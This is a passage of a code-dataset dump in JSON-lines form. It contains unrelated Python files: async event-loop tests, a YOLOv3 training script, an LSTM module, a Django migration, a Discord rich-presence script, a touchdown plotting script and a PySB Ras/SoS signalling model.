make_loop(scheduler)\n\n loop.run_step()\n\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [call.cb0(), call.cb1()]\n assert selector.mock_calls == [call.select(0)]\n assert clock.now() == 50.0\n\n def test_runs_only_pending_cbs(self, selector, clock, make_loop):\n cb1 = Mock()\n cb2 = Mock()\n scheduler = Scheduler([Handle(None, cb1)], [Handle(60, cb2)])\n loop = make_loop(scheduler)\n\n loop.run_step()\n\n assert scheduler.get_items() == [Handle(60, cb2)]\n assert cb1.mock_calls == [call()]\n assert cb2.mock_calls == []\n assert selector.mock_calls == [call.select(0)]\n assert clock.now() == 50\n\n @pytest.mark.parametrize(\"now\", [0.0, 15.0])\n def test_executes_handle_eagerly_if_time_less_clock_resolution(\n self, selector, clock, make_loop, now\n ):\n clock.now.return_value = now\n cb1 = Mock()\n cb2 = Mock()\n h1 = Handle(now + clock.resolution() / 2, cb1)\n h2 = Handle(now + clock.resolution() * 2, cb2)\n scheduler = Scheduler([], [h1, h2])\n loop = make_loop(scheduler)\n\n loop.run_step()\n\n assert scheduler.get_items() == [h2]\n assert cb1.mock_calls == [call()]\n assert selector.mock_calls == [call.select(0)]\n assert clock.now() == now\n\n def test_run_both_pending_and_scheduled(self, clock, selector, make_loop):\n parent_cb = Mock()\n rcb0 = parent_cb.rcb0\n rcb1 = parent_cb.rcb1\n scb0 = parent_cb.scb0\n scb1 = parent_cb.scb1\n\n scheduler = Scheduler(\n [Handle(None, rcb0), Handle(None, rcb1)],\n [Handle(55.0, scb0), Handle(60.0, scb1)],\n )\n loop = make_loop(scheduler)\n\n # must consume all pending cbs and first scheduled on second step\n for i in range(2):\n loop.run_step()\n\n assert scheduler.get_items() == [Handle(60.0, scb1)]\n assert selector.mock_calls == [call.select(0), call.select(5.0)]\n\n # call order isn't guarantied\n assert sorted(parent_cb.mock_calls) == sorted([call.rcb0(), call.rcb1(), call.scb0()])\n\n def test_enqueue_pending_during_select(self, selector, clock, make_loop):\n first_cb = Mock(name=\"first-cb\")\n enqueued_cb = Mock(name=\"enqueued-cb\")\n\n scheduler = Scheduler(enqueued=[Handle(55.0, first_cb)])\n loop = make_loop(scheduler)\n\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (scheduler.enqueue(Handle(None, enqueued_cb)) or DEFAULT)\n )\n\n loop.run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert first_cb.mock_calls == [call()]\n assert enqueued_cb.mock_calls == [call()]\n assert scheduler.get_items() == []\n\n def test_enqueue_later_during_select(self, selector, clock, make_loop):\n first_cb = Mock(name=\"first-cb\")\n enqueued_cb = Mock(name=\"enqueued-cb\")\n\n scheduler = Scheduler(enqueued=[Handle(55.0, first_cb)])\n loop = make_loop(scheduler)\n\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (scheduler.enqueue(Handle(clock.now(), enqueued_cb)) or DEFAULT)\n )\n\n loop.run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert first_cb.mock_calls == [call()]\n assert enqueued_cb.mock_calls == [call()]\n assert scheduler.get_items() == []\n\n def test_enqueue_much_later_during_select(self, selector, clock, make_loop):\n first_cb = Mock(name=\"first-cb\")\n enqueued_cb = Mock(name=\"enqueued-cb\")\n enqueued_handle = Handle(100, enqueued_cb)\n\n scheduler = Scheduler(enqueued=[Handle(55.0, first_cb)])\n loop = make_loop(scheduler)\n\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (scheduler.enqueue(enqueued_handle) or DEFAULT)\n )\n\n loop.run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert first_cb.mock_calls == [call()]\n assert enqueued_cb.mock_calls == []\n assert scheduler.get_items() == [enqueued_handle]\n\n def test_sets_running_loop_cv_in_handle_callback(self, make_loop):\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n @mock_wraps\n def handle_cb():\n assert aio.loop._priv.running_loop.get() is loop\n\n loop = make_loop(Scheduler([Handle(None, handle_cb)]))\n loop.run_step()\n assert handle_cb.mock_calls == [call()]\n\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n def test_sets_running_loop_cv_in_io_callback(self, make_loop, selector):\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n test_exc = OSError(\"Test OS error\")\n\n @mock_wraps\n def io_callback(*_):\n assert aio.loop._priv.running_loop.get() is loop\n\n selector.select = lambda *_: [(io_callback, 0, 0, test_exc)]\n\n loop = make_loop(Scheduler())\n loop.run_step()\n\n assert io_callback.mock_calls == [call(0, 0, test_exc)]\n\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n\nclass TestLoopRunner:\n @pytest.fixture\n def loop(self, loop_policy):\n with loop_policy.create_loop() as loop:\n yield loop\n\n @pytest.fixture\n def loop_runner(self, loop_policy, loop):\n return loop_policy.create_loop_runner(loop)\n\n def test_runs_one_callback(self, loop, loop_runner):\n def callback():\n loop_runner.stop_loop()\n\n cb_mock = Mock(wraps=callback)\n\n loop.call_soon(cb_mock)\n\n with pytest.raises(LoopStopped):\n loop_runner.run_loop()\n\n assert cb_mock.mock_calls == [call()]\n\n def test_runs_callbacks_after_stop_callback(self, loop, loop_runner):\n def callback1():\n loop_runner.stop_loop()\n loop.call_soon(cb2_mock)\n\n cb1_mock = Mock(wraps=callback1)\n cb2_mock = Mock()\n\n loop.call_soon(cb1_mock)\n\n with pytest.raises(LoopStopped):\n loop_runner.run_loop()\n\n assert cb1_mock.mock_calls == [call()]\n assert cb2_mock.mock_calls == [call()]\n\n def test_runs_late_callbacks_after_stop_callback(self, loop, loop_runner):\n def callback1():\n loop_runner.stop_loop()\n loop.call_later(10, cb2_mock)\n\n cb1_mock = Mock(wraps=callback1)\n cb2_mock = Mock()\n\n loop.call_soon(cb1_mock)\n\n time_before = loop.clock.now()\n with pytest.raises(LoopStopped):\n loop_runner.run_loop()\n\n assert loop.clock.now() - time_before == 10\n assert cb1_mock.mock_calls == [call()]\n assert cb2_mock.mock_calls == [call()]\n\n\n@pytest.mark.usefixtures(\"loop_policy\")\nclass TestEntryRun:\n def test_runs_simple_coroutine(self):\n should_be_called = Mock()\n\n async def root():\n should_be_called()\n\n aio.run(root())\n\n assert should_be_called.mock_calls == [call()]\n\n def test_returns_coroutine_result(self):\n result = Mock(name=\"result\")\n\n async def root():\n return result\n\n assert aio.run(root()) == result\n\n def test_propagates_coroutine_exception(self):\n async def root():\n raise Exception(\"Some exception\")\n\n with pytest.raises(Exception, match=\"Some exception\"):\n aio.run(root())\n\n def test_runs_multi_suspend_coroutine(self, clock):\n should_be_called = Mock()\n\n async def root():\n at_start = clock.now()\n\n for i in range(1, 11):\n await aio.sleep(1)\n assert clock.now() - at_start == 1.0 * i\n\n should_be_called()\n\n aio.run(root())\n assert should_be_called.mock_calls == [call()]\n\n def test_changes_sigint_to_cancelled_v1(self):\n should_be_called = Mock()\n should_not_be_called = Mock()\n\n async def root():\n should_be_called()\n # Probably wont work in a lot of cases and may cause wired behaviour\n os.kill(os.getpid(), signal.SIGINT)\n # Suspend coroutine to initialize further processing\n await aio.sleep(10)\n\n should_not_be_called()\n\n with pytest.raises(aio.KeyboardCancelled):\n aio.run(root())\n\n assert should_be_called.mock_calls == [call()]\n assert should_not_be_called.mock_calls == []\n\n def test_changes_sigint_to_cancelled_v2(self):\n should_be_called = Mock()\n should_not_be_called = Mock()\n\n async def root():\n should_be_called()\n # Probably wont work in a lot of cases and may cause wired behaviour\n loop_ = await aio.loop.get_running()\n loop_.call_soon(os.kill, os.getpid(), signal.SIGINT)\n # Suspend coroutine to initialize further processing\n await aio.sleep(10)\n\n should_not_be_called()\n\n with pytest.raises(aio.KeyboardCancelled):\n aio.run(root())\n\n assert should_be_called.mock_calls == [call()]\n assert should_not_be_called.mock_calls == []\n\n def test_should_warn_if_async_gen_being_gc_while_not_finished(self, clock):\n should_be_called_in_root = Mock()\n should_be_called_in_gen = Mock()\n should_not_be_called_in_gen = Mock()\n\n async def async_gen():\n should_be_called_in_gen()\n yield 1\n yield 2\n should_not_be_called_in_gen()\n\n async def root():\n should_be_called_in_root()\n\n gen = async_gen()\n await gen.asend(None)\n del gen\n\n gc.collect()\n\n with pytest.warns(UserWarning) as warn_info:\n aio.run(root())\n\n assert should_be_called_in_root.mock_calls == [call()]\n assert should_be_called_in_gen.mock_calls == [call()]\n assert should_not_be_called_in_gen.mock_calls == []\n assert any(\n \"Async-generator shutdown request income for\" in warn.message.args[0]\n and warn.filename == __file__\n for warn in warn_info.list\n )\n\n def test_should_not_warn_if_async_gen_being_gc_after_finish(self, clock):\n should_be_called_in_root = Mock()\n should_be_called_in_gen = Mock()\n\n async def async_gen():\n should_be_called_in_gen()\n yield 1\n yield 2\n should_be_called_in_gen()\n\n async def root():\n should_be_called_in_root()\n\n async for _ in async_gen():\n pass\n\n gc.collect()\n\n with pytest.WarningsRecorder(_ispytest=True) as warn_info:\n aio.run(root())\n\n assert should_be_called_in_root.mock_calls == [call()]\n assert should_be_called_in_gen.mock_calls == [call(), call()]\n assert warn_info.list == []\n","sub_path":"tests/test_loop.py","file_name":"test_loop.py","file_ext":"py","file_size_in_byte":17912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160815672","text":"from __future__ import division\n\nfrom models import *\nfrom utils.utils import *\nfrom utils.datasets import *\nfrom utils.parse_config import *\n\nimport os\nimport sys\nimport time\nimport datetime\nimport argparse\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nimport torch.optim as optim\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=30, help='number of epochs')\nparser.add_argument('--image_folder', type=str, default='data/samples', help='path to dataset')\nparser.add_argument('--train_image_path', type=str, default='data/train_data/images', help='path to train images')\nparser.add_argument('--batch_size', type=int, default=8, help='size of each image batch')\nparser.add_argument('--model_config_path', type=str, default='config/yolov3.cfg', help='path to model config file')\nparser.add_argument('--data_config_path', type=str, default='config/coco.data', help='path to data config file')\nparser.add_argument('--weights_path', type=str, default='checkpoints_pre/57.weights', help='path to weights file')\nparser.add_argument('--load_weights', type=bool, default=False, help='whether to load pretrained weights')\nparser.add_argument('--class_path', type=str, default='data/smile.names', help='path to class label file')\nparser.add_argument('--conf_thres', type=float, default=0.8, help='object confidence threshold')\nparser.add_argument('--nms_thres', type=float, default=0.4, help='iou thresshold for non-maximum suppression')\nparser.add_argument('--n_cpu', type=int, default=0, help='number of cpu threads to use during batch generation')\nparser.add_argument('--img_size', type=int, default=416, help='size of each image dimension')\nparser.add_argument('--checkpoint_interval', type=int, default=1, help='interval between saving model weights')\nparser.add_argument('--checkpoint_dir', type=str, default='checkpoints', help='directory where model checkpoints are saved')\nparser.add_argument('--use_cuda', type=bool, default=False, help='whether to use cuda if available')\nopt = parser.parse_args()\nprint(opt)\n\ncuda = torch.cuda.is_available() and opt.use_cuda\n\nos.makedirs('output', exist_ok=True)\nos.makedirs('checkpoints', exist_ok=True)\n\nclasses = load_classes(opt.class_path)\n\n\n# # Get data configuration\n# data_config = parse_data_config(opt.data_config_path)\n# train_path = data_config['train']\n\n# Get hyper parameters\nhyperparams = parse_model_config(opt.model_config_path)[0]\nlearning_rate = float(hyperparams['learning_rate'])\nmomentum = float(hyperparams['momentum'])\ndecay = float(hyperparams['decay'])\nburn_in = int(hyperparams['burn_in'])\n\n\n# Initiate model\nmodel = Darknet(opt.model_config_path)\nif opt.load_weights == True:\n model.load_weights(opt.weights_path)\n print('================================================================================\\n'\n 'Loaded pretrained weights: %s\\n' % opt.weights_path)\nelse:\n model.apply(weights_init_normal)\n print('================================================================================\\n'\n '[Warning] No weights loaded!!! Initializing weights\\n'\n ': If you want to load pretrained weights, set the argument load_weights to TRUE\\n')\n\nif cuda:\n model = model.cuda()\n\nmodel.train()\n\n# Get dataloader\ndataloader = torch.utils.data.DataLoader(\n ListDataset(opt.train_image_path),\n batch_size=opt.batch_size, shuffle=False, num_workers=opt.n_cpu)\nprint('Data loaded: %d batches X %d images (with labels)\\n'\n '================================================================================'\n % (len(dataloader), opt.batch_size ))\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\noptimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum, dampening=0, weight_decay=decay)\n\nprint('Start Training...')\nfor epoch in range(opt.epochs):\n for batch_i, (_, imgs, targets) in enumerate(dataloader):\n imgs = Variable(imgs.type(Tensor))\n targets = Variable(targets.type(Tensor), requires_grad=False)\n\n optimizer.zero_grad()\n\n loss = model(imgs, targets)\n\n loss.backward()\n optimizer.step()\n\n print('[Epoch %d/%d, Batch %d/%d] [Losses: x %f, y %f, w %f, h %f, conf %f, cls %f, total %f, recall: %.5f]' %\n (epoch + 1, opt.epochs, batch_i + 1, len(dataloader),\n model.losses['x'], model.losses['y'], model.losses['w'],\n model.losses['h'], model.losses['conf'], model.losses['cls'],\n loss.item(), model.losses['recall']))\n\n model.seen += imgs.size(0)\n\n if epoch % opt.checkpoint_interval == 0:\n count = opt.weights_path.split('/')[1].split('.')[0]\n model.save_weights('%s/%d.weights' % (opt.checkpoint_dir, epoch+int(count)+1))\n print('Checkpoint saved')\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312940837","text":"# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\n\n\nclass ParserLSTM(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_layers=1,\n batch_first=False, dropout=0, bidirectional=False):\n super(ParserLSTM, self).__init__()\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.batch_first = batch_first\n self.dropout = dropout\n self.bidirectional = bidirectional\n self.num_directions = 2 if bidirectional else 1\n\n self.f_cells = nn.ModuleList()\n self.b_cells = nn.ModuleList()\n for layer in range(self.num_layers):\n self.f_cells.append(nn.LSTMCell(input_size=input_size,\n hidden_size=hidden_size))\n if bidirectional:\n self.b_cells.append(nn.LSTMCell(input_size=input_size,\n hidden_size=hidden_size))\n input_size = hidden_size * self.num_directions\n\n self.reset_parameters()\n\n def reset_parameters(self):\n for i in self.parameters():\n # apply orthogonal_ to weight\n if len(i.shape) > 1:\n nn.init.orthogonal_(i)\n # apply zeros_ to bias\n else:\n nn.init.zeros_(i)\n\n def _lstm_forward(self, x, hx, mask, cell, in_mask,\n hid_mask, reverse):\n output = []\n seq_len = x.size(0)\n if in_mask is not None:\n x = x * in_mask\n steps = reversed(range(seq_len)) if reverse else range(seq_len)\n\n for t in steps:\n h_next, c_next = cell(input=x[t], hx=hx)\n h_next = h_next * mask[t]\n c_next = c_next * mask[t]\n output.append(h_next)\n if hid_mask is not None:\n h_next = h_next * hid_mask\n hx = (h_next, c_next)\n if reverse:\n output.reverse()\n output = torch.stack(output, 0)\n\n return output\n\n def forward(self, x, mask, hx=None):\n if self.batch_first:\n x = x.transpose(0, 1)\n mask = mask.transpose(0, 1)\n mask = torch.unsqueeze(mask, dim=2).float()\n seq_len, batch_size, input_size = x.shape\n\n if hx is None:\n initial = x.new_zeros(batch_size, self.hidden_size)\n hx = (initial, initial)\n\n for layer in range(self.num_layers):\n in_mask, hid_mask, b_hid_mask = None, None, None\n if self.training:\n in_mask = torch.bernoulli(\n x.new_full((batch_size, x.size(2)), 1 - self.dropout)\n ) / (1 - self.dropout)\n hid_mask = torch.bernoulli(\n x.new_full((batch_size, self.hidden_size),\n 1 - self.dropout)\n ) / (1 - self.dropout)\n if self.bidirectional:\n b_hid_mask = torch.bernoulli(\n x.new_full((batch_size, self.hidden_size),\n 1 - self.dropout)\n ) / (1 - self.dropout)\n\n layer_output = self._lstm_forward(x=x,\n hx=hx,\n mask=mask,\n cell=self.f_cells[layer],\n in_mask=in_mask,\n hid_mask=hid_mask,\n reverse=False)\n\n if self.bidirectional:\n b_layer_output = self._lstm_forward(x=x,\n hx=hx,\n mask=mask,\n cell=self.b_cells[layer],\n in_mask=in_mask,\n hid_mask=b_hid_mask,\n reverse=True)\n if self.bidirectional:\n x = torch.cat([layer_output, b_layer_output], 2)\n else:\n x = layer_output\n\n if self.batch_first:\n x = x.transpose(0, 1)\n\n return x\n","sub_path":"parser/modules/parser_lstm.py","file_name":"parser_lstm.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644083885","text":"# coding=utf-8\nfrom __future__ import unicode_literals\n\nimport django.db.models.deletion\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='RateSource',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('base_currency', models.CharField(default=b'EUR', max_length=3, blank=True)),\n ('last_update', models.DateTimeField(auto_now=True)),\n ],\n ),\n migrations.CreateModel(\n name='Rate',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('currency', models.CharField(max_length=3)),\n ('value', models.DecimalField(max_digits=14, decimal_places=6)),\n ('date', models.DateField(auto_now_add=True)),\n ],\n ),\n migrations.AddField(\n model_name='rate',\n name='source',\n field=models.ForeignKey(\n related_query_name=b'rate', related_name='rates', on_delete=models.PROTECT, to='txmoneyrates.RateSource'\n ),\n ),\n migrations.AlterUniqueTogether(\n name='ratesource',\n unique_together={('name', 'base_currency')},\n ),\n migrations.AlterUniqueTogether(\n name='rate',\n unique_together={('source', 'currency', 'date')},\n ),\n ]\n","sub_path":"txmoney/rates/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"425492692","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\r\ndef solve(s):\r\n l=[]\r\n g=[]\r\n l.append(s.split(' '))\r\n \r\n \r\n for i in l[0][::]:\r\n c=i.capitalize()\r\n g.append(c)\r\n return \" \".join(g)","sub_path":"Capitalize.py","file_name":"Capitalize.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"151006660","text":"from p37_csv_DictReader使用_num和getcolors函数 import num\nfrom p37_csv_DictReader使用_num和getcolors函数 import getcolors\n\nimport csv\nimport matplotlib.pyplot as plt\n\n\n\n\ndef getQbNames():\n\tqbnames = ['peyton Manning']\n\t# name = ''\n\ti = 0\n\twith open('./qb_data.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tfor row in reader:\n\t\t\tif(qbnames[i] != row['Name']):\n\t\t\t\tqbnames.append(row['Name'])\n\t\t\t\ti = i+ 1\n\treturn qbnames\n\ndef readQbdata():\n\tresultdata = []\n\twith open('./qb_data.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tresultdata = [row for row in reader]\n\t\treturn resultdata\n\n# fdata = []\n# prevysum = 0\n\n\nqbnames = getQbNames()\nfdata = readQbdata()\n\ni = 0\n# rank = 0\nprevysum = 0\nlastyr = 0\nhighrank = 300\ncolorsdata = getcolors()\n\nfig = plt.figure(figsize=(15,13))\nax = fig.add_subplot(111,axisbg='white')\n\n# limits for TD\nplt.xlim(10,800)\nplt.ylim(1940,2021)\n\ncolindex = 0\nlastage = 20\n\n\nfor qbn in qbnames:\n\tx = []\n\ty = []\n\tprevysum = 0\n\tfor row in fdata:\n\t\tif(row['Name'] == qbn and row['Year'] != 'Career'):\n\t\t\tyrval = num(row['Year'])\n\t\t\tlastage = num(row['Age'])\n\t\t\tprevysum += num(row['TD'])\n\t\t\tlastyr = yrval\n\t\t\ty += [yrval]\n\t\t\tx += [prevysum]\n\n\n\tif(prevysum > highrank):\n\t\tplt.plot(x, y, color=colorsdata[colindex], label=qbn, linewidth=2.5)\n\t\tplt.legend(loc=0, prop={'size':10})\n\t\tcolindex = (colindex+1)%22\n\t\tif qbn == 'Tom Brady':\n\t\t\tplt.text( prevysum+2,lastyr+1, qbn+\"(\"+str(prevysum)+\"):\"+str(lastage), \\\n\t\t\tfontsize=9)\n\t\telse:\n\t\t\tplt.text( prevysum+2,lastyr-1, qbn+\"(\"+str(prevysum)+\"):\"+str(lastage), \\\n\t\t\tfontsize=9)\n\telse:\n\t\tplt.plot(x, y, color=colorsdata[22], linewidth=1.5)\nplt.xlabel('Year', fontsize=18)\nplt.ylabel('Cumulative Touch Downs', fontsize=18)\nplt.title(\"Cumulative Touch Downs by Quarter Backs\", fontsize=20)\nplt.show()\n","sub_path":"python数据可视化/p42_体育案例_(触地得分,年份).py","file_name":"p42_体育案例_(触地得分,年份).py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189006739","text":"\n\n\ndef get_input(data_type, message):\n \"\"\"Asks the user for input and confirms input is correct\"\"\"\n response = raw_input(\"{}{}\".format(message, \"\\n\"))\n\n # Ask User to confirm input\n check_confirmation = 1\n while check_confirmation == 1:\n confirm = raw_input(\n \"You entered: '{}'. Press ENTER if that is correct:\".format(response))\n if confirm == '':\n check_confirmation = 0\n else:\n response = raw_input(\"{}{}\".format(message, \"\\n\"))\n\n # If input is wrong type, promt user for input again\n check_error = 1\n while check_error == 1:\n try:\n response = data_type(response)\n except:\n error_message = \"Your input isnt the correct type. Try Again.\\n\"\n response = raw_input(\"{}{}{}\".format(error_message, message, \"\\n\"))\n else: check_error = 0\n\n return response\n","sub_path":"game_chooser/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207726009","text":"# Import Packages\nfrom pypresence import Presence\nimport time\n\nclient_id = \"801321552250535977\" # Your application id here\n\n# button labels and urls\nbtn_label_1 = \"Invite Cartero\"\nbtn_label_2 = \"Join Support Server\"\nbtn_url_1 = \"https://discord.com/api/oauth2/authorize?client_id=801321552250535977&permissions=8&scope=bot%20applications.commands\"\nbtn_url_2 = \"https://discord.com/invite/bNZefkNqVw\"\n\n# Rich Presence setup\nRPC = Presence(client_id=client_id)\nRPC.connect()\nRPC.update(\n state='Developing Cartero', # Rich Presence state\n details='Moderation', # Rich Presence details\n small_image='small', small_text='Cartero', # Set small image and its text (Optional)\n large_image='large', large_text='Cartero', # Set large image and its text (Optional)\n buttons=[\n {\"label\": btn_label_1, \"url\": btn_url_1}, # btn 1 (Optional)\n {\"label\": btn_label_2, \"url\": btn_url_2} # btn 2 (Optional)\n ]\n)\n\nprint(\"Rich Presence enabled\")\n\nwhile 1:\n time.sleep(15)\n","sub_path":"RichPresence.py","file_name":"RichPresence.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"315361744","text":"import argparse\nimport datetime\nimport os\nimport subprocess\n\nimport numpy as np\nimport pandas as pd\nfrom pysb import *\nfrom pysb.integrate import odesolve\n\nfrom pysb_t_cell_network import write_columns, write_model_attributes\nfrom src.general.directory_handling import make_and_cd\n\n\ndef add_new_monomer(product):\n try:\n model.monomers[product]\n except:\n Monomer(product)\n Initial(eval(product + \"()\"), Parameter(product + \"_0\", 0))\n\n\ndef add_observable(species):\n Observable(\"O_{0}\".format(species), eval('{0}()'.format(species)))\n\n\nclass SoSFeedback(object):\n\n def __init__(self):\n self.run_time = 300\n self.tspan = np.linspace(0, self.run_time)\n\n self.sos = [round(i) for i in np.linspace(25, 500, num=40)]\n\n self.model = Model()\n\n def define_monomers(self):\n Monomer('Sos')\n Monomer('Ras_GDP')\n Monomer('Ras_GTP')\n Monomer('Ras_GAP')\n\n Parameter('Sos_0', self.sos[0])\n Parameter('Ras_GDP_0', 300)\n Parameter('Ras_GAP_0', 10)\n Parameter('Ras_GTP_0', 0)\n\n Initial(Sos(), Sos_0)\n Initial(Ras_GDP(), Ras_GDP_0)\n Initial(Ras_GAP(), Ras_GAP_0)\n Initial(Ras_GTP(), Ras_GTP_0)\n\n def add_step_1(self):\n Parameter('k_sos_on_rgdp', 0.0024)\n Parameter('k_sos_off_rgdp', 3.0)\n\n product = \"Sos_Ras_GDP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product), Sos() + Ras_GDP() | eval('{0}()'.format(product)),\n k_sos_on_rgdp, k_sos_off_rgdp)\n\n add_observable(product)\n return product\n\n def add_step_2(self):\n Parameter('k_sos_on_rgtp', 0.0022)\n Parameter('k_sos_off_rgtp', 0.4)\n\n product = \"Sos_Ras_GTP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product), Sos() + Ras_GTP() | eval('{0}()'.format(product)),\n k_sos_on_rgtp, k_sos_off_rgtp)\n\n add_observable(product)\n\n return product\n\n def add_step_3(self):\n Parameter('k_rgdp_on_sos_rgtp', 0.001)\n Parameter('k_rgdp_off_sos_rgtp', 0.1)\n Parameter('k_cat_3', 0.038 * 1.7)\n\n previous_product = self.add_step_2()\n\n product = \"Sos_Ras_GTP_Ras_GDP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product),\n eval('{0}()'.format(previous_product)) + Ras_GDP() | eval('{0}()'.format(product)),\n k_rgdp_on_sos_rgtp, k_rgdp_off_sos_rgtp)\n\n Rule('{0}_cat'.format(product),\n eval('{0}()'.format(product)) >> eval('{0}()'.format(previous_product)) + Ras_GTP(),\n k_cat_3)\n\n def add_step_4(self):\n Parameter('k_rgdp_on_sos_rgdp', 0.0014)\n Parameter('k_rgdp_off_sos_rgdp', 1.0)\n Parameter('k_cat_4', 0.003)\n\n previous_product = self.add_step_1()\n\n product = \"Sos_Ras_GDP_Ras_GDP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product),\n eval('{0}()'.format(previous_product)) + Ras_GDP() | eval('{0}()'.format(product)),\n k_rgdp_on_sos_rgdp, k_rgdp_off_sos_rgdp)\n\n Rule('{0}_cat'.format(product),\n eval('{0}()'.format(product)) >> eval('{0}()'.format(previous_product)) + Ras_GTP(),\n k_cat_4)\n\n def add_step_5(self):\n Parameter('k_rgap_on_rgtp', 0.0348)\n Parameter('k_rgap_off_rgtp', 0.2)\n Parameter('k_cat_5', 0.1)\n\n product = \"Ras_GAP_Ras_GTP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product),\n Ras_GAP() + Ras_GTP() | eval('{0}()'.format(product)),\n k_rgap_on_rgtp, k_rgap_off_rgtp)\n\n add_observable(product)\n\n Rule('{0}_cat'.format(product),\n eval('{0}()'.format(product)) >> Ras_GAP() + Ras_GDP(),\n k_cat_5)\n\n def make_model(self):\n # Model()\n\n self.define_monomers()\n\n observables = []\n\n self.add_step_3()\n self.add_step_4()\n self.add_step_5()\n\n add_observable(\"Ras_GTP\")\n\n product = \"Ras_GTP\"\n observables.append(\"O_{0}\".format(product))\n\n return observables\n\n def main(self):\n sos_array = []\n output = []\n observables = self.make_model()\n\n write_columns(observables)\n write_model_attributes(model.rules, \"rules\")\n write_model_attributes(model.parameters, \"parameters\")\n write_model_attributes(model.observables, \"observables\")\n\n np.savetxt(\"time\", self.tspan, fmt='%f')\n\n for sos in self.sos:\n model.parameters['Sos_0'].value = sos\n y = odesolve(model, self.tspan, compiler=\"python\")\n\n sos_array.append(sos)\n # print(y[observables[0]][-1])\n output.append(y[observables[0]][-1])\n\n df = pd.DataFrame({'Sos': sos_array, 'RasGTP': output})\n df.to_csv(\"./sos_rasgtp\", sep='\\t')\n\n # np.savetxt(\"Sos\", sos_array, fmt='%f')\n # np.savetxt(\"RasGTP\", output, fmt='%f')\n\n\nclass SoSFeedbackLigandSpecific(SoSFeedback):\n def __init__(self):\n SoSFeedback.__init__(self)\n\n self.sos_total = [round(i) for i in np.linspace(25, 500, num=40)]\n\n\nclass LaunchQsub(object):\n def __init__(self):\n self.simulation_name = \"Sos_FB\"\n self.simulation_time = 2\n\n def generate_qsub(self):\n q = open(\"qsub.sh\", \"w\")\n q.write(\"#PBS -m ae\\n\")\n q.write(\"#PBS -q short\\n\")\n q.write(\"#PBS -V\\n\")\n q.write(\"#PBS -l walltime={1},nodes=1:ppn=2 -N {0}\\n\\n\".format(self.simulation_name,\n datetime.timedelta(\n minutes=self.simulation_time)))\n q.write(\"cd $PBS_O_WORKDIR\\n\")\n q.write(\"echo $PBS_JOBID > job_id\\n\\n\")\n\n q.write(\n \"python ~/SSC_python_modules/pysb_sos_fb.py --run\\n\")\n q.close()\n\n def launch(self):\n (stdout, stderr) = subprocess.Popen([\"qsub {0}\".format(\"qsub.sh\")], shell=True, stdout=subprocess.PIPE,\n cwd=os.getcwd()).communicate()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Submitting ode calculations as function of steps\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--run', action='store_true', default=False,\n help='Flag for submitting simulations.')\n\n args = parser.parse_args()\n\n if not args.run:\n make_and_cd(\"Ras_SoS_Fb_200\")\n qsub = LaunchQsub()\n qsub.generate_qsub()\n qsub.launch()\n else:\n sos = SoSFeedback()\n sos.main()\n","sub_path":"src/data/pysb_ras_sos.py","file_name":"pysb_ras_sos.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435857360","text":"# -*- coding: utf-8 -*-\nfrom 